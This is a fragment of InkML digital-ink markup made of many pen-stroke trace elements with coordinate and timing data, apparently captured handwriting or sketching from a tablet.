  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="43884.388">11155 8690,'44'-8,"-4"7,-40 1,0 0,0 0,25 9,-25-9,0 0,6 13,-6-13,1 42,-13 20,-3 30,-10-11,14-9,4-13,8-21,2-25,12-17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="44311.4307">12181 8736,'-33'-10,"19"23,14-13,0 0,3 60,-3-60,20 87,-6 4,-5-9,-2-21,-4-18,-6-14</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="44795.4791">13249 8783,'-4'14,"-19"34,23-48,-28 72,16 21,13 5,17 12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="48669.8665">5468 4031</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="50516.0511">6909 2730,'-2'0,"-3"6,5-6,0 0,0 0,-21 27,21-27,0 0,-25 41,25-41,-41 67,-16 4,-9-16,6-2,18-19,14-4,25-18</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="51162.1157">7015 2733,'0'31,"6"37,-6-68,2 105,-6 0,9-36,-8-35,9-32,4-28,7-25,18-5,15 27,7 43,-12 16,-13 9,-46 4,-17-11,-35-13,-11-5,35-15,24-10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="51385.138">7403 2977,'-16'27,"4"19,12-46,-23 54,12-1,13-26,-4-24,-1-24</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="51497.1492">7366 2863,'-2'-20,"12"9,-10 11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="51839.1834">7590 3043,'12'52,"-13"-9,-17-13,18-19,-1-14,1-27,32-16,10-13,25 25,-18 37,33 30,-66 6,-14 4,-11 7,-4-11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="52169.2164">8414 2656,'-7'16,"-12"36,19-52,-31 95,-22 24,-15 7,21-32,21-34,4-18,26-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="52583.2578">8603 2987,'-48'-20,"-2"23,50-3,0 0,-35 23,35-23,-38 40,34 2,23-10,18-12,24-10,-14-2,-9 8,-7 15,-25-3,-45-3,1-8,-31-15,16-11,10-7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="53088.3083">8732 2638,'8'21,"3"33,-11-54,0 82,-10 28,15 5,-4-35,0-44,10-29,8-31,9-29,15-3,-2 19,5 37,8 39,-23 18,-8 7,-26 10,-17-3,-14-4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="54662.4657">820 5125,'29'-28,"-32"32,3-4,0 0,0 0,-31 34,31-34,0 0,-55 46,55-46,-52 45</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="54875.487">714 5458,'19'102,"21"9,12 5,-3 10,-25 18,-33 18,-41 28,-12 40,12 8,14 32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="58573.8568">6180 11281,'-48'6,"-18"-7,66 1,-65 1,-10 0,-2 2,-8-1,-14 0,-13-10,-12-2,0 0,-25-3,6 2,-13-2,2 2,7-5,5 0,2 3,33-2,31 13,13-5,16 12</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16:04.248"/>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definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">14739 2255,'28'-4,"1"-4,-29 8,0 0,59-3,-59 3,78 5,28 1,24 16,13 7,34-1,-11-14,-15-19,8 1,-1 11,-26 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1418.2836">19782 2342,'67'-5,"9"-3,12 3,12 2,8-4,19-8,3 8,15-6,12 5,7-4,2 4,26 6,-3-8,-10 14,21 6,6 6,2 9,-2-15,6 9,-9-5,-21-13,-9-6,-39-14</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4029.8058">16402 4569,'8'-25,"-13"-7,5 32,0 0,-21-30,21 30,-27-20,-23 5,-19 7,-4 14,4 19,24 28,34 22,5 23,-1 7,-8 12,-7 14,10 1,-4-4,-15 22,-7-8,5 10,14 26,11 5,8 0,-2 13,6-16,-5-5,6 9,5-19,-20-7,-4-14,6-26,29-30,21-10,22-21,-4-12,-6-9,-8-11,3-7,25 4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="8900.7798">946 12798,'6'-7,"-4"-2,-2 9,0 0,0 0,0 0,3-1,-3 1,0 0,0 0,18 11,-18-11,0 0,50 25,-50-25,82 22,12-5,3 7,7-10,-5-3,3 9,-4-6,-9-13,-12 0,-5-1,-6-4,-4 14,-11-8,-25-4,-14-1,-8 0,-7 3,-4-3,-3-1,-3-15,-4-32,-2-9,-8-12,-4 0,-4 27,25 38,10 15,34 55,29 29,0 10,-22-17,-29-21,-31-20,-66 0,-21-18,22 3,23-13,22-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="9862.9722">2708 12928,'54'23,"-6"0,-48-23,43 11,-5-21,-1-25,7-26,4-17,-1-11,-20-2,-9 11,-16 2,-9 5,9 0,11 9,-5 14,1 31,-4 13,1 13,10 31,-9 8,6 3,2-26,0-21,13-24,-19-26,-23-22,-31-3,-14 31,-9 34,-11 16,14 27,23 10,19-11,15-9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="10336.0668">3793 12491,'-85'-5,"-16"11,33 19,38 7,32-5,50 0,31-20,14 9,-19 10,-39 3,-25 14,-53-9,-50-11,-2-15,37-9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="10591.1178">3994 12238,'-3'14,"-17"52,20-66,-12 96,-2 14,3-16,18-35,1-40</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="10769.1534">4059 12499,'-14'-4,"-39"-1,53 5,0 0,-49 4,49-4,-56-1,19 5,33 4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="11141.2278">4298 12491,'15'-8,"-45"7,30 1,0 0,0 0,-64 9,64-9,0 0,-50 27,50-27,-33 51,26-15,43-10,12-26,1-27,4-13,-19 23,-7 25,3 35,-24-3,7 6,-13-29,7-14</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="11433.2862">4687 12440,'1'0,"-20"6,19-6,0 0,-56 25,56-25,-51 45,18 23,26-2,52-17,24-24,10-21,-10-20</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="11864.3724">5007 12093,'15'55,"-9"52,2 20,-5 8,4-38,19-36,-2-44</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="12122.424">5244 12390,'-21'7,"-41"27,62-34,-69 58,15 19,31-6,51-11,47-10,38-22,18-12,16-2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13153.6302">16100 4799,'-9'3,"-16"3,25-6,0 0,0 0,-37 15,37-15,0 0,-53 22,53-22,-72 22,-40-11,-15-21,-5-7,2-2,6-2,0 3,20 8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="14688.9372">1897 11651,'1'-7,"-36"-20,35 27,0 0,-75-27,75 27,-91-53,-2-19,12 1,30 11,32-15,40-8,33 19,4-32,-13-20,-22-15,-20-49,-23-6,-12 0,-3 3,15-2,1 19,5-2,34-12,35 0,-18 15,-40-15,-21 2,-2-2,-3-7,13 17,1 27,-1-17,16 3,35 18,30-19,33 21,5 12,-20 14,-35 11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="26209.2408">21785 12695,'-6'1,"-14"-2,20 1,0 0,0 0,0 0,0 0,-19-3,19 3,0 0,0 0,0 0,-14-2,14 2,0 0,0 0,-15 7,15-7,0 0,-24 17,24-17,-40 18,-1-13,-8-3,-6-5,9-7,-1-5,-9-3,-13 0,9 14,6 6,-4 14,14-2,-1 8,1-8,1-7,-14-7,0-12,-20-7,-10-3,-1 2,-12 4,1 5,-8 4,0 9,0 13,8 16,7 9,-9 1,11-23,-3-9,-7-23,-5-4,-13-11,-6 7,-2 7,17 4,-31-12,3 5,6 7,5 8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="36312.261">13253 10920,'9'-18,"-14"-29,5 47,0 0,-2-60,2 60,0-78,-7-28,-7-16,21-2,50 11,52 28,5 14,-13-22,-65-37,-63-54,-52-52,10-4,18 5,18-20,24 19,25 7,33-14,10 8,-11-10,-23-37,-16-7,-26 7,-41-39,-14 12,22 29,27-5,19 24,11 12,5-12,4 13,-2 10,7-11,7 18,19 22,-2-8,-24 15,-15 3,-26-10,5 10,11 15,9-14,-18 5,-12 4,-6-17,21 19,7 16,14-9,38 23</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="38915.7816">13795 11023,'12'-8,"15"9,-27-1,0 0,55 7,-55-7,76 10,32 6,16 12,16 2,39 2,25-2,21 5,44 12,0-5,-6-9,25-6,-9-5,-1-7,28-1,-8-7,-25-4,0-2,-23 10,-17 21,8 19,-31 18,-54 3,-58 11,-55-2,-23-3,-20-9,1-34,-9-18,5-17,10-33,12-10,19 2,3 19,-11 25,-14 14,-20 22,-6-4,-9-6,-9-18,-19-26,-30-22,-24 2,-12-3,15-1,3 11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="75503.0976">18761 9140,'9'1,"-11"4,2-5,-7 7,-15 6,22-13,0 0,0 0,-35 22,35-22,0 0,-54 17,54-17,-75 11,-16-3,2-13,-14 3,10-2,1 0,-13 3,22-16,13-6,7-4,22 10,28 14,12 3,3 7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="77449.4868">2007 11331,'-6'-6,"-12"1,18 5,0 0,0 0,-13-12,13 12,0 0,-27-30,27 30,-24-34,-15-10,3 3</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="77596.5162">1690 10880,'7'-34,"-6"-8,-1 42,0 0,0 0,10-36,-10 36,0 0,6-21,-6 21</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="77773.5516">1759 10555,'39'-34,"-29"14,-10 20,0 0,-1-42,1 42,-8-41</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="77917.5804">1874 10180,'24'-37,"-18"6,-6 31,0 0,-8-22,8 22</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="78078.6126">1801 9829,'4'-49,"-8"27,4 22,0 0,-9-51,9 51</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="78236.6442">1830 9313,'-1'-53,"1"-5,0 58,-10-62</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="78413.6796">1743 8785,'9'-58,"-3"2,-6 56,2-57,0 15,-12-20</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="78574.7118">1777 8243,'25'-28,"-11"-7,-14 35,0 0,0 0,0-32,0 32,0 0,0-33,0 33</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="78750.747">1840 7768,'1'-35,"-3"-16,2 51,0 0,-10-30,10 30,-16-46</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="78913.7796">1800 7410,'5'-25,"-9"11,4 14,0 0,0 0,-5-14,5 14,0 0,-2-16,2 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="79087.8144">1806 7127,'12'-30,"-8"12,-9-5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="79248.8466">1799 6775,'13'-38,"-5"11,-8 27,0 0,-8-35,8 35</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="79410.879">1821 6429,'8'-21,"2"-1,-10 22,0 0,0-20,0 20</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="79568.9106">1864 6193,'6'-21,"-6"-8,-7 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="79732.9434">1830 5808,'4'-24,"-1"-25,-3 49,0 0,-3-28,3 28</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="79888.9746">1743 5507,'12'-30,"-14"-4,-6-3,7 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="80052.0072">1743 5169,'-9'-44,"4"-15,5 59,6-50,14-7,-8-8,-6 17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="80193.0354">1770 4543,'14'-52,"-8"37,-6 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="80333.0634">1801 4249,'-12'-21</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="80509.0986">1693 3967,'24'-65,"-22"13,-2 52,4-46</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="80665.1298">1781 3346,'24'-58,"-17"15,-7 43</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="80843.1654">1753 2888,'16'-48,"-15"9,-1 39,0 0,-5-38,5 38</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="81002.1972">1702 2406,'6'-95</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="81165.2298">1691 1822,'22'-91,"-16"16,1-2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="81320.2608">2007 1131,'71'-71,"-15"27,-12 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="81477.2922">2988 874,'65'-17,"-3"2,-62 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="81627.3222">4103 698,'195'-20,"-20"20</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="81975.3918">5875 964,'256'148,"-66"46,-8 55,-46 29,-18 31,33 55,-3 5,-23 6,-60 19,-48 5,1 8,16-4,0-8,-18 31,-21-22,-26-4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="82073.4114">7297 7611,'18'371,"-10"7,-22-10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="82233.4434">7355 10808,'52'310,"-6"-36,31 2,-10-57</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="82410.4788">8177 12780,'103'27,"-7"-16,1 1,-6-4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="82557.5082">8931 12913,'-11'-18,"-20"1,31 17,0 0,-48-26,48 26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="82717.5402">8766 12604,'41'-20,"-23"-10,-18 30,0 0,23-35,-23 35</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="82872.5712">8843 12350,'2'-13,"-3"-7,-11-9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="83019.6006">8715 12038,'4'-18,"-2"-13,-2 31</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="83194.6356">8778 11717,'28'-15,"-18"-4,-10 19,0 0,-14-34,14 34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="83351.667">8742 11390,'11'-34,"-1"-1,-10 35,0 0,-5-42,5 42,10-44</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="83499.6966">8742 11063,'3'-31,"7"10,-10 21,0 0,0 0,11-21,-11 21,0 0,7-24,-7 24,0-34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="83628.7224">8705 10761,'-1'-32,"11"7,-10 25,0 0,0 0,3-30,-3 30,0 0,-1-39,1 39</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="83786.754">8685 10294,'13'-35,"-17"-9,4 44</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="83946.786">8555 9790,'37'-38,"-26"6,-11 32,0 0,16-34,-16 34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="84130.8228">8670 9353,'31'-25,"-25"3,-6 22,0 0,-14-43,14 43</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="84279.8526">8686 8928,'15'-36,"-9"4,-6 32,0 0,-10-42,10 42</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="84437.8842">8701 8521,'26'-38,"-5"-6,-21 44,22-34,-21-17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="84611.919">8777 7919,'14'-47,"-9"7,-5 40,-15-53</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="84772.9512">8750 7492,'13'-34,"4"6,-17 28,0 0,1-40,-1 40,12-40</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="85005.9978">8847 7015,'24'-48,"-15"-7,-9 55,-3-57</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="85107.018">8910 6511,'32'-43,"-18"4,-14 39,-7-51</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="85251.0468">8894 5983,'3'-49,"-1"-8,-2 57,-4-68</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="85431.0828">8856 5385,'25'-62,"-7"5,-18 57,4-55,2-4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="85573.1112">8868 4739,'22'-28,"-27"-3,5 31</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="85747.146">8883 4367,'23'-36,"-24"9,1 27,0 0,-2-35,2 35</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="85905.1776">8859 3841,'21'-68,"-10"12,-11 56,0-55</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="86081.2128">8955 3145,'24'-61,"-14"4,-10 57</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="88317.66">11360 11109,'-43'-5,"-19"-3,62 8,-69-8,-9 7,-10 4,4 11,-11-4,-11-5,-2-14,0-9,9-8,1-9,13-6,14-5,1-8,6-12,8-17,8-21,22-14,11-23,6-11,3-32,0 0,8-10,-6-15,-1 4,-4-3,-3-21,-4-1,10-2,13-18,-8 5,-9 3,5-30,-2 12,3 4,-9-25,-4 10,-7 7,11-19,10 17,-5 6,-10-16,-14 3,6 15,2-23,-2 16,-2 2,-1-11,22 22,20 22,9-9,-16 18,-4 10,3 5,5 22,10 20,2-2,-19 15,-2 13,-16 8,10 18,16 9,20 21</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="89596.9158">11334 11016,'29'-94,"14"-8,6 1,-5-16,1-39,2-34,-3-28,-3-49,-18-28,-8-23,-1-52,0 1,3-10,-6-59,3-5,7-12,5-38,-12 35,-31 8,-32-35,7 28,9 24,23-26,22 32,-7 31,1 2,-15 34,-9 30,11 10,9 42,12 22,6 2,-3 42,2 46,22 90,-7 76</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="174832.9596">12189 9359,'3'-24,"-12"15,9 9,0 0,0 0,-3 6,3-6,0 0,-4 52,4-52,14 111,-4 26,0-1,-3-51,-9-53,3-37,10-49,11-30,31 2,-2 47,-1 45,-5 31,-31 17,-41-4,-39-9,-18-14,7-14,9-17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="175349.0628">12277 8808,'12'30,"-2"25,-10-55,3 61,2-4,5-23,1-25,-17-34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="175506.0942">12006 8221,'-16'-51</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="176427.2784">12095 7563,'-18'-7,"15"24,3-17,0 0,9 55,-9-55,19 85,-7 6,2-17,-16-30,5-32,-12-25,1-48,9-21,22-13,20 23,22 55,5 32,-1 37,-21 20,-27 0,-18-7,-22-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="177038.4006">12528 6566,'11'-2,"-22"26,11-24,0 0,-36 66,36-66,-54 79,-29 24,6 11,16-41,15-22,23-9,16-35,18-23</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="177751.5432">12337 5611,'-1'-4,"-29"1,30 3,0 0,-45 0,45 0,-61 15,-4 26,21-3,27-14,25-13,34-15,25-8,23 4,-12 26,-20 21,-41 14,-41-3,-51-10,-46-14,28-13,24-23</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="178724.7378">12111 4412,'11'1,"-10"19,-1-20,0 0,21 87,-21-87,22 134,5-1,-6-22,-7-39,-2-39,-9-33,5-31,10-26,26-8,5 45,11 41,-3 35,-28 18,-25-6,-7-15,0-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="531455.7986">19747 12821,'3'-2,"7"1,-10 1,0 0,0 0,15 7,-15-7,0 0,20 31,-20-31,23 68,-7 18,-3 12,-5 4,-2-6,-10-15,-20-14,-3-27,-29-15,-44-12,-37-20,-40-18,-55-18,-33 12,-16-5,-54-8,-6-2,-3 5,-32 0,28 4,20 8,1-3,42-1,14-3,33-8,46 2,43 4,17 4,26 1,13 2,13 0,32 9,27 4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="532390.8921">19751 12961,'2'-19,"9"13,-11 6,0 0,0 0,0 0,22 2,-22-2,0 0,0 0,35 5,-35-5,0 0,49 25,-49-25,50 46,14 16,-25-9,-37-26,-20-23,-23-39,-19-43,7-6,9 0,9 51,11 22,-19 20,-30 2,-26-3,6-7,14 3,2 5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="567497.4024">13240 12414,'6'-2,"-5"0,-1 2,0 0,-1-4,1 4,-8-5,-14-2,22 7,0 0,0 0,0 0,0 0,-29 1,29-1,0 0,0 0,0 0,-27 7,27-7,0 0,0 0,-19 22,19-22,0 0,-13 37,13-37,-11 38,22-3,16-10,11-4,14 3,-19 2,-15-1,-25 8,-30-8,-25-5,3-5,32-6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="567829.4356">13305 12237,'2'10,"15"37,-17-47,14 86,4 16,-5-3,6-26,3-27</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="568054.4581">13504 12517,'7'-2,"-22"9,15-7,0 0,0 0,-46 11,46-11,0 0,-65 16,65-16,-62 21,15-4,30-7,23-9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="568408.4935">13565 12552,'-9'20,"10"18,-1-38,0 0,18 47,-18-47,22 42,21-18,1-25,-6-33,-29-25,-31 1,-27 17,-7 19,8 19,0 13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="568694.5221">13893 12663,'-14'-24,"-7"-13,21 37,0 0,-24-49,24 49,-17-61,17 20,13 16,5 12,5 13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="569064.5591">14071 12578,'28'-11,"4"-17,-32 28,0 0,24-38,-24 38,12-54,-14-4,-13 21,-11 17,-12 18,7 26,0 25,17 22,25-6,33-11,15-23,-4-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="569504.6031">14431 12297,'-2'-18,"-24"2,26 16,0 0,0 0,-57 3,57-3,0 0,-49 31,49-31,-24 61,37 19,34-14,16-27,-1-35,-29-51,-41-51,-38-65,-35 29,10 62,48 47,31 36,30 54,35 57,2 30,-10-21,-8-38</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="569977.6504">14926 12356,'7'42,"3"15,-10-57,21 47,4-31,-1-27,-11-43,-39-11,-21 24,3 31,26 20</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="570300.6827">15049 12294,'14'-8,"6"26,-20-18,0 0,0 0,28 46,-28-46,0 0,15 53,-15-53,5 37,-1-29,-3-25,7-29,-2-4,15 23,13 38,8 22,-17 17,-45 11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="570912.7439">12631 13289,'32'30,"24"28,-56-58,43 60,-22-23,-14-27,-22-22,-20-48,-1-43,16 3,28 62,33 26,17 26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="571235.7762">12965 13336,'30'0,"1"-20,-31 20,0 0,29-41,-29 41,10-56,-27 5,-28 29,21 27,4 28,16 32,21 6,5-12,22-20,1-32,6-28</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="571576.8103">13246 13182,'-33'7,"-1"15,34-22,0 0,-31 29,31-29,-2 32,39-5,-37-27,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,51 13,-51-13,0 0,0 0,0 0,0 0,0 0,0 0,0 0,51-9,-51 9,0 0,0 0,0 0,0 0,0 0,0 0,36-29,-36 29,0 0,0 0,0 0,0 0,0 0,10-39,-10 39,0 0,0 0,0 0,0 0,-10-31,10 31,0 0,0 0,0 0,-2-4,2 4,0 0,0 0,12 21,-12-21,0 0,13 46,-13-46,12 42,0-7,-1-25</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="572013.854">13504 13035,'-15'-5,"-9"15,24-10,0 0,0 0,-24 36,24-36,0 0,-14 56,14-56,5 81,32-18,8-27,-5-33,-19-39,-30-57,-28-29,-17 22,8 40,34 47,21 34,13 57,2 20,7 6,9-18,10-42</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="572395.8922">13991 13146,'-3'19,"4"25,-1-44,0 0,-3 56,3-56,7 46,24-21,10-31,-5-28,-15-22,-40 3,-6 23,-1 10,-2 4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="572705.9232">14091 13118,'50'21,"-19"23,-31-44,17 44,-12-5,0-17,-4-21,-3-28,-2-18,12-15,-7 20,18 39,15 31,-4 10,-17-8,-13-19</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="572914.9441">14199 12889,'26'8,"12"33,-38-41,29 61,-4 14,-7-3,3-20,8-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="573223.975">14420 13097,'4'-15,"0"20,-4-5,0 0,0 0,23 37,-23-37,0 0,23 45,-23-45,21 35,0-21,1-18,1-16,5 4,3 21,-2 26,-14 25,-17 7,-31-3,-17-11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="573723.0249">14269 13636,'37'62,"-1"9,-12-4,-8-22,-23-34,-13-33,-13-41,7-29,13-2,27 27,18 46,8 33,-7 34,-14 12,-32-3,-22-15,-4-26,8-16,16-18,29-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="574113.0639">14517 13573,'31'5,"-37"-9,6 4,0 0,0 0,-26 4,26-4,0 0,-27 31,27-31,-13 55,24-1,19-15,3-30,-14-30,7-38,-2 5,-10 24,4 27,7 27,-4 4,-8-4,-9-15,-4-10,3-12,6-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="574799.1325">14833 13496,'22'-5,"-19"2,-3 3,0 0,0 0,0 0,-31-11,31 11,0 0,0 0,-51 2,51-2,0 0,-48 18,48-18,-35 45,41 4,36-10,14-19,-9-22,-13-13,-3-6,-2 17,-2 22,1 24,-7 5,-21 1,-20-16,-7-10,12-18,18-23,9-33,4-27,14-32,2 16,-24 42,-14 14,-28 12,-19 22,3 30,43 27,56 12,45-4,12-32,-35-34,-30-48,-35-13,-20 20</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="741673.8183">14156 8719,'-1'-1,"-2"8,3-7,0 0,0 0,-9 33,9-33,0 0,-5 69,5-69,0 93,7 7,3-33,0-36,-3-27,-3-39,-18-42,-12-40,-8 7,20 34,27 21,27 13,18 19,14 30,-6 26,-26 10,-32 8,-33-8,-32 0,-7-8,20-3,29 0,30 14,18 5,23 2,-2-3,20-9,0-16,-9-22,-32-13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="742254.8764">14721 9209,'5'-3,"-6"-4,1 7,0 0,0 0,6-33,-6 33,0 0,10-67,-10 67,3-117,2-51,15 15,18 79,3 60,3 44,-5 59,-11 33,6 4,0-16,-4-34,-11-43,-7-45</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="742415.8925">15056 8937,'-10'0,"-16"7,26-7,0 0,-45 10,45-10,-61 13,-13-3,-10-10</inkml:trace>
